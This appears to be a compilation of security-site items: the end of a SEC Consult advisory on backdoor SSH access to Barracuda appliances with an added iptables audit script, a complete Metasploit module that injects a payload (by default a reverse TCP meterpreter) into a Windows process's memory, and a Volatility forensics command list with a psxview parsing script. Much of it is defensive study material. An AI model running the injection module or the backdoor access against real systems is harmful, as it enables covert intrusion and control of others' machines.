-A INPUT -s 205.158.110.0/255.255.255.0 -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -s 205.158.110.0/255.255.255.0 -p tcp -m tcp --dport 22 --tcp-flags SYN,RST,ACK SYN -j ACCEPT
-A INPUT -s 216.129.105.0/255.255.255.0 -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -s 216.129.105.0/255.255.255.0 -p tcp -m tcp --dport 22 --tcp-flags SYN,RST,ACK SYN -j ACCEPT
-A INPUT -p tcp -m tcp --dport 22 -j REJECT --reject-with icmp-port-unreachable
COMMIT
# Completed on Thu Oct 9 16:39:19 2003
```

Note: The timestamp and the version of iptables-save suggest that these rules might have been in place on Barracuda Networks appliances since 2003.

Users from these networks can access the SSH daemon running (by default on the tested appliances) on port 22 e.g. by using the backdoor accounts:

* Private IP ranges
  192.168.200.0/24
  192.168.10.0/24

  In some situations a user might be able to set his IP address (in the local network) to one within the private ranges and then be allowed to access SSH.

* Public IP ranges
  205.158.110.0/24
  216.129.105.0/24

  These ranges include some servers run by Barracuda Networks eg.
  spam04.barracuda.com (216.129.105.22)
  forum.barracudanetworks.com (216.129.105.38)
  barracudacentral.org (216.129.105.40)
  repsrv.barracuda.com (216.129.105.42)
  mirror01.barracudacentral.com (216.129.105.94)
  ...

  but also servers from other entities:
  mail.totalpaas.com (205.158.110.135) - Domain registered by: Domains By Proxy, LLC
  ...
  frmt1.boxitweb.com (205.158.110.132) - Domain registered by: Thor Myhrstad
  static.medallia.com (205.158.110.229) - Domain registered by: Medallia Inc.
  utility.connectify.net (205.158.110.171) - Domain registered by: Connectify Networks, Inc.
  everest.address.com (216.129.105.202) - Domain registered by: WhitePages, Inc.
  mail.tqm.bz (216.129.105.205) - Domain registered by: Total Quality Maintenance, Inc
  outbound.andyforbes.com (216.129.105.212) - Domain registered by: HM hosting
  ...

  More information about the hosts in these /24 networks can be found at:
  http://cnet.robtex.com/205.158.110.html
  http://cnet.robtex.com/216.129.105.html

A breach of any server in the whitelisted ranges enables an attack against all affected Barracuda Networks appliances on the web.

Note: The credentials from 1) (eg. "product" user) can be used to get a shell on an appliance.

Vulnerable / tested versions:
-----------------------------
The vulnerability has been verified to exist in Barracuda SSL VPN version 2.2.2.203, which was the most recent version at the time of discovery.

Barracuda Networks confirmed that _all_ of their appliances with the exception of the Barracuda Backup Server, Barracuda Firewall, and Barracuda NG Firewall are affected as well in _all_ available versions.

Vendor contact timeline:
------------------------
2012-11-29: Contacting vendor.
2012-11-29: Sending advisory and proof of concept exploit via encrypted channel.
2012-12-04: Vendor confirms receipt and provides BNSEC IDs.
2012-12-05: Requesting further coordination (conference call).
2012-12-13: Sending reminder regarding SEC Consult disclosure policy.
2012-12-15: Vendor responds - arranging conference call.
2012-12-18: Conference call: Addressing the risks the discovered vulnerabilities pose to customers and release schedule.
2013-01-14: Vendor sends listing of reported vulnerabilities and release schedule.
2013-01-21: Conference call - discussing implemented solutions.
2013-01-21: Vendor provides information about some questions which came up.
2013-01-22: Asking for definitive listing of affected appliances.
2013-01-23: Barracuda Networks releases alert & secdef
2013-01-24: SEC Consult releases coordinated security advisory.

Solution:
---------
Update to Security Definition 2.0.5. This will change the sshd config to only allow logins from the following users:

* cluster (login with public/private key)
* remote (login with public/private key, Barracuda Networks is in possession of the corresponding private key)
* root (login with password, password hash (listed above) might be crackable depending on password strength)

According to Barracuda Networks these accounts are essential for customer support and will not be removed.

The vulnerability described in 2) is _not_ handled by this patch.

This still leaves considerable risks to appliances as the password for the 'root' user might be crackable and the relevant private keys for the 'remote' user might be stolen from Barracuda Networks. In secure environments it is highly undesirable to use appliances with backdoors built into them. Even if only the manufacturer can access them.

Workaround:
-----------
Place the appliances behind a firewall and block any incoming traffic (local and Internet) to port 22.

Barracuda Networks offers an expert option that disables the SSH daemon. For assistance contact the Barracuda Networks Support.

Advisory URL:
--------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Unternehmensberatung GmbH
Office Vienna
Mooslackengasse 17
A-1190 Vienna
Austria
Tel.: +43 / 1 / 890 30 43 - 0
Fax.: +43 / 1 / 890 30 43 - 25
Mail: research at sec-consult dot com
www.sec-consult.com
EOF S. Viehböck / @2013

Source: PacketStorm
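The rule set quoted in the advisory is small enough to read by eye, but on a real appliance the question a defender wants answered is mechanical: which source networks does the INPUT chain actually admit to tcp/22, and what happens to a given client address? The script below is an added example written for this page; it is not part of the SEC Consult advisory and is not Barracuda Networks tooling. It embeds the iptables-save dump quoted above, extracts the `--dport` rules of the filter table, lists the accepted source networks in CIDR form, and walks the chain first-match for a client address. The client addresses tried at the bottom (203.0.113.7 and friends) are constructed, and all function names are my own. The same check is what you would run after applying the workaround to confirm that no source is still accepted to port 22.

```python
"""Audit which source networks an iptables-save dump admits to a TCP port.

Added example, not from the SEC Consult advisory or from Barracuda Networks.
SAMPLE_DUMP is the iptables-save output quoted in the advisory; the client
addresses tested at the bottom are constructed for illustration.
"""
import ipaddress
import re
from typing import List, Optional, Tuple

SAMPLE_DUMP = """\
# Generated by iptables-save v1.2.7a on Thu Oct 9 16:39:19 2003
*nat
:PREROUTING ACCEPT [4012:488438]
:POSTROUTING ACCEPT [641:40599]
:OUTPUT ACCEPT [641:40599]
COMMIT
*filter
:INPUT ACCEPT [42408:13197223]
:FORWARD ACCEPT [0:0]
:OUTPUT ACCEPT [49685:7341128]
-A INPUT -s localhost -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -s 192.168.200.0/255.255.255.0 -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -s 192.168.200.0/255.255.255.0 -p tcp -m tcp --dport 22 --tcp-flags SYN,RST,ACK SYN -j ACCEPT
-A INPUT -s 192.168.10.0/255.255.255.0 -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -s 192.168.10.0/255.255.255.0 -p tcp -m tcp --dport 22 --tcp-flags SYN,RST,ACK SYN -j ACCEPT
-A INPUT -s 205.158.110.0/255.255.255.0 -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -s 205.158.110.0/255.255.255.0 -p tcp -m tcp --dport 22 --tcp-flags SYN,RST,ACK SYN -j ACCEPT
-A INPUT -s 216.129.105.0/255.255.255.0 -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -s 216.129.105.0/255.255.255.0 -p tcp -m tcp --dport 22 --tcp-flags SYN,RST,ACK SYN -j ACCEPT
-A INPUT -p tcp -m tcp --dport 22 -j REJECT --reject-with icmp-port-unreachable
COMMIT
"""

# One parsed rule: (chain, source as written, destination port, jump target)
Rule = Tuple[str, str, int, str]

RULE_RE = re.compile(
    r"^-A\s+(?P<chain>\S+)"          # chain the rule is appended to
    r"(?:\s+-s\s+(?P<src>\S+))?"     # optional source match
    r".*?--dport\s+(?P<port>\d+)"    # destination port
    r".*?-j\s+(?P<target>\S+)"       # jump target (ACCEPT, REJECT, ...)
)


def parse_port_rules(dump: str, table: str = "filter") -> List[Rule]:
    """Return the --dport rules of `table` in chain order. A rule without -s
    is recorded with source 0.0.0.0/0, which is how iptables treats it."""
    rules: List[Rule] = []
    current = None
    for line in dump.splitlines():
        line = line.strip()
        if line.startswith("*"):            # "*filter" / "*nat": table header
            current = line[1:]
            continue
        if current != table:
            continue
        m = RULE_RE.match(line)
        if m:
            rules.append((m["chain"], m["src"] or "0.0.0.0/0",
                          int(m["port"]), m["target"]))
    return rules


def to_network(src: str) -> Optional[ipaddress.IPv4Network]:
    """Map an -s value to a network. iptables-save writes dotted netmasks
    ('a.b.c.d/255.255.255.0'), which ipaddress accepts directly; 'localhost'
    is taken as the loopback host. Unrecognised sources yield None."""
    if src == "localhost":
        return ipaddress.IPv4Network("127.0.0.1/32")
    try:
        return ipaddress.IPv4Network(src, strict=False)
    except ValueError:
        return None


def allowed_sources(dump: str, port: int, chain: str = "INPUT") -> List[str]:
    """Deduplicated CIDR list of the sources ACCEPTed to `port` on `chain`."""
    seen: List[str] = []
    for c, src, p, target in parse_port_rules(dump):
        if c != chain or p != port or target != "ACCEPT":
            continue
        net = to_network(src)
        cidr = str(net) if net else src
        if cidr not in seen:
            seen.append(cidr)
    return seen


def verdict(dump: str, client_ip: str, port: int, chain: str = "INPUT") -> str:
    """First-match walk of `chain` for one client address: the target of the
    first rule whose source contains the client, or 'POLICY' when no rule
    matches (the chain policy then decides; it is ACCEPT in the quoted dump)."""
    ip = ipaddress.IPv4Address(client_ip)
    for c, src, p, target in parse_port_rules(dump):
        if c != chain or p != port:
            continue
        net = to_network(src)
        if net is not None and ip in net:
            return target
    return "POLICY"


if __name__ == "__main__":
    print("sources accepted to tcp/22:", allowed_sources(SAMPLE_DUMP, 22))
    for client in ("192.168.10.55", "216.129.105.205", "203.0.113.7"):
        print(f"{client:>16} -> {verdict(SAMPLE_DUMP, client, 22)}")
```

The `verdict` for a port with no rules at all comes back as `POLICY`, which matters here because the INPUT chain policy in the dump is ACCEPT: a port with no explicit REJECT is open, so the workaround of filtering port 22 upstream should be verified from outside the appliance as well as in the rule set.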
-
This Metasploit module will inject a payload into memory of a process. If a payload isn't selected, then it'll default to a reverse x86 TCP meterpreter. If the PID datastore option isn't specified, then it'll inject into notepad.exe instead.

```ruby
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'
require 'rex'
require 'msf/core/exploit/exe'

class Metasploit3 < Msf::Exploit::Local
  Rank = ExcellentRanking

  def initialize(info={})
    super(update_info(info,
      'Name'           => 'Windows Manage Memory Payload Injection',
      'Description'    => %q{
        This module will inject a payload into memory of a process. If a payload
        isn't selected, then it'll default to a reverse x86 TCP meterpreter. If the
        PID datastore option isn't specified, then it'll inject into notepad.exe
        instead.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Carlos Perez <carlos_perez[at]darkoperator.com>',
          'sinn3r'
        ],
      'Platform'       => [ 'win' ],
      'SessionTypes'   => [ 'meterpreter' ],
      'Targets'        => [ [ 'Windows', {} ] ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => "Oct 12 2011"
    ))

    register_options(
      [
        OptInt.new('PID', [false, 'Process Identifier of the process to inject the payload into.']),
        OptBool.new('NEWPROCESS', [false, 'New notepad.exe to inject to', false])
      ], self.class)
  end

  # Run Method for when run command is issued
  def exploit
    @payload_name = datastore['PAYLOAD']
    @payload_arch = framework.payloads.create(@payload_name).arch

    # sysinfo is only on meterpreter sessions
    print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil?

    pid = get_pid
    if not pid
      print_error("Unable to get a proper PID")
      return
    end

    if @payload_arch.first =~ /64/ and client.platform =~ /x86/
      print_error("You are trying to inject to a x64 process from a x86 version of Meterpreter.")
      print_error("Migrate to an x64 process and try again.")
      return false
    else
      inject_into_pid(pid)
    end
  end

  # Figures out which PID to inject to
  def get_pid
    pid = datastore['PID']
    if pid == 0 or datastore['NEWPROCESS'] or not has_pid?(pid)
      print_status("Launching notepad.exe...")
      pid = create_temp_proc
    end
    return pid
  end

  # Determines if a PID actually exists
  def has_pid?(pid)
    procs = []
    begin
      procs = client.sys.process.processes
    rescue Rex::Post::Meterpreter::RequestError
      print_error("Unable to enumerate processes")
      return false
    end

    procs.each do |p|
      return true if p['pid'] == pid
    end

    print_error("PID #{pid.to_s} does not actually exist.")
    return false
  end

  # Checks that the Architecture of the Payload and the PID are compatible
  # Returns true if they are, false if they are not
  def arch_check(pid)
    # get the pid arch
    client.sys.process.processes.each do |p|
      # Check Payload Arch
      if pid == p["pid"]
        vprint_status("Process found, checking Architecture")
        if @payload_arch.first == p['arch']
          vprint_good("Process is the same architecture as the payload")
          return true
        else
          print_error("The PID #{p['arch']} and Payload #{@payload_arch.first} architectures are different.")
          return false
        end
      end
    end
  end

  # Creates a temp notepad.exe to inject payload in to given the payload
  # Returns process PID
  def create_temp_proc()
    windir = client.fs.file.expand_path("%windir%")
    # Select path of executable to run depending on the architecture
    if @payload_arch.first == "x86" and client.platform =~ /x86/
      cmd = "#{windir}\\System32\\notepad.exe"
    elsif @payload_arch.first == "x86_64" and client.platform =~ /x64/
      cmd = "#{windir}\\System32\\notepad.exe"
    elsif @payload_arch.first == "x86_64" and client.platform =~ /x86/
      cmd = "#{windir}\\Sysnative\\notepad.exe"
    elsif @payload_arch.first == "x86" and client.platform =~ /x64/
      cmd = "#{windir}\\SysWOW64\\notepad.exe"
    end

    begin
      proc = client.sys.process.execute(cmd, nil, {'Hidden' => true })
    rescue Rex::Post::Meterpreter::RequestError
      return nil
    end

    return proc.pid
  end

  def inject_into_pid(pid)
    vprint_status("Performing Architecture Check")
    return if not arch_check(pid)

    begin
      print_status("Preparing '#{@payload_name}' for PID #{pid}")
      raw = payload.generate

      print_status("Opening process #{pid.to_s}")
      host_process = client.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS)
      if not host_process
        print_error("Unable to open #{pid.to_s}")
        return
      end

      print_status("Allocating memory in process #{pid}")
      mem = host_process.memory.allocate(raw.length + (raw.length % 1024))

      # Ensure memory is set for execution
      host_process.memory.protect(mem)

      print_status("Allocated memory at address #{"0x%.8x" % mem}, for #{raw.length} byte stager")
      print_status("Writing the stager into memory...")
      host_process.memory.write(mem, raw)
      host_process.thread.create(mem, 0)
      print_good("Successfully injected payload in to process: #{pid}")
    rescue Rex::Post::Meterpreter::RequestError => e
      print_error("Unable to inject payload:")
      print_line(e.to_s)
    end
  end
end
```

Source: PacketStorm
-
Description: In this video I will show you Commands of Volatility Framework for Malware and Rootkit analysis

Commands list

./vol.py -f zeus.vmem pslist
To list the processes of a system, use the pslist command.

./vol.py -f zeus.vmem malfind
You can use it to find hidden or injected code/DLLs in user mode memory

./vol.py -f zeus.vmem ldrmodules
To find out the hidden dll

./vol.py -f zeus.vmem apihooks
To find API hooks in user mode or kernel mode

./vol.py -f zeus.vmem idt
IDT (Interrupt Descriptor Table)

./vol.py -f zeus.vmem gdt
Gdt (Global Descriptor Table)

./vol.py -f zeus.vmem threads -L
The command gives you extensive details on threads

./vol.py -f zeus.vmem callbacks
Callbacks for detecting Windows kernel use of these callbacks to monitor and/or react to events.

./vol.py -f zeus.vmem driverirp
To print a driver's IRP Major Function table

./vol.py -f zeus.vmem devicetree
Windows uses a layered driver architecture

./vol.py -f zeus.vmem psxview
This plugin helps you detect hidden processes.

Source : - Wiki Pages - volatility - An advanced memory forensics framework - Google Project Hosting

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying.

Original Source: Source: Volatility - Malware And Rootkits Command Usage
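The last command in that list, psxview, is the one an analyst reads most carefully, because it cross-references several independent ways of finding processes and a process that is missing from pslist but present elsewhere is the classic signature of a rootkit that unlinked its EPROCESS from the active process list. The script below is an added example written for this page, not from the video and not part of the Volatility project. It assumes the column layout psxview prints in Volatility 2.x (Offset, Name, PID, one True/False column per source, then ExitTime); the sample output is constructed for illustration rather than captured from zeus.vmem, and the function names are mine. It parses the table, separates the gaps that are normal for early-boot processes from the suspicious ones, and flags hidden-process candidates while excluding processes that merely terminated and are still lying around in pool memory.

```python
"""Flag hidden-process candidates in Volatility 2 psxview output.

Added example, not from the video or from the Volatility project. Assumes the
Volatility 2.x psxview column layout; SAMPLE_PSXVIEW is constructed, not a
real capture.
"""
from typing import Dict, List, Optional, Set

SAMPLE_PSXVIEW = """\
Offset(P)  Name                    PID pslist psscan thrdproc pspcid csrss session deskthrd ExitTime
---------- -------------------- ------ ------ ------ -------- ------ ----- ------- -------- --------
0x0a2b7c50 System                    4 True   True   True     True   False False   False
0x0a1f0b40 smss.exe                368 True   True   True     True   False False   False
0x0a3c1d28 csrss.exe               584 True   True   True     True   False True    True
0x0a41ccd8 explorer.exe           1464 True   True   True     True   True  True    True
0x0a2d3e70 hidden.exe             1744 False  True   True     True   True  True    True
0x0a19a020 notepad.exe            2212 False  True   False    False  False False   False    2013-01-24 10:14:02 UTC+0000
"""

# Sources that are legitimately False for some processes: System and smss.exe
# start before csrss exists and own no session or desktop threads, and csrss
# does not appear in its own handle table.
EXPECTED_GAPS: Dict[str, Set[str]] = {
    "System":    {"csrss", "session", "deskthrd"},
    "smss.exe":  {"csrss", "session", "deskthrd"},
    "csrss.exe": {"csrss"},
}


def parse_psxview(text: str) -> List[Dict]:
    """Turn the psxview table into one dict per process."""
    lines = [ln for ln in text.splitlines() if ln.strip()]
    header = lines[0].split()
    # Every column between PID and ExitTime is a True/False process source.
    sources = header[header.index("PID") + 1:header.index("ExitTime")]
    rows: List[Dict] = []
    for line in lines[1:]:
        if line.startswith("---"):
            continue                      # column underline
        tok = line.split()
        # The first True/False token starts the source columns; the PID sits
        # right before it and the name is everything in between.
        b: Optional[int] = next((i for i, t in enumerate(tok) if t in ("True", "False")), None)
        if b is None:
            continue                      # not a data row
        n = len(sources)
        rows.append({
            "offset":    tok[0],
            "name":      " ".join(tok[1:b - 1]),
            "pid":       int(tok[b - 1]),
            "sources":   dict(zip(sources, (t == "True" for t in tok[b:b + n]))),
            "exit_time": " ".join(tok[b + n:]),   # empty when still running
        })
    return rows


def missing_sources(row: Dict) -> Set[str]:
    """Sources that did not see this process, minus the gaps expected for it."""
    absent = {s for s, seen in row["sources"].items() if not seen}
    return absent - EXPECTED_GAPS.get(row["name"], set())


def find_hidden(rows: List[Dict]) -> List[Dict]:
    """Hidden-process candidates: absent from pslist (the linked EPROCESS list)
    yet found by the pool scanner, and not simply a terminated process."""
    hidden = []
    for r in rows:
        if r["exit_time"]:
            continue                      # exited; stale pool object, not hidden
        if not r["sources"]["pslist"] and r["sources"]["psscan"]:
            hidden.append(r)
    return hidden


if __name__ == "__main__":
    rows = parse_psxview(SAMPLE_PSXVIEW)
    for r in find_hidden(rows):
        print(f"HIDDEN? {r['name']} pid={r['pid']} missing from {sorted(missing_sources(r))}")
```

The ExitTime exclusion is the caveat worth remembering: a process that exited moments before the capture will also be absent from pslist but present in psscan, so without it every recently closed program looks like a rootkit. Treat the result as a lead, and follow it with the dlllist, malfind and handles plugins against the flagged PID.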